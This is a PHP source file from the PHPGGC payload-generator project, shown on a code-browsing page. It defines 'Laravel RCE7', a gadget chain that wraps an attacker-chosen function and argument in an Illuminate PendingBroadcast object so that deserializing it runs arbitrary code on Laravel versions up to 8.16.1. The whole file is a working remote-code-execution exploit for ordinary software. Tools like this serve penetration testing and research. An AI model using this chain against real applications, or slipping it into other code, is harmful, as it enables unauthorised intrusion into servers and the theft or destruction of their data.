Codebase list phpggc / 745c43e4-5f50-4c34-8814-533f4ac155d4/main gadgetchains / Laravel / RCE / 7 / chain.php
745c43e4-5f50-4c34-8814-533f4ac155d4/main

Tree @745c43e4-5f50-4c34-8814-533f4ac155d4/main (Download .tar.gz)

chain.php @745c43e4-5f50-4c34-8814-533f4ac155d4/mainraw · history · blame

<?php

namespace GadgetChain\Laravel;

class RCE7 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '? <= 8.16.1'; // will test for more version at a later date
    public static $vector = '__destruct';
    public static $author = 'whira';
    public static $information = 'This chain throws a RuntimeException immediately after code execution.';

    public function generate(array $parameters)
    {
        $function = $parameters['function'];
        $parameter = $parameters['parameter'];

        return new \Illuminate\Broadcasting\PendingBroadcast(
            $function, 
            $parameter
        );
    }
}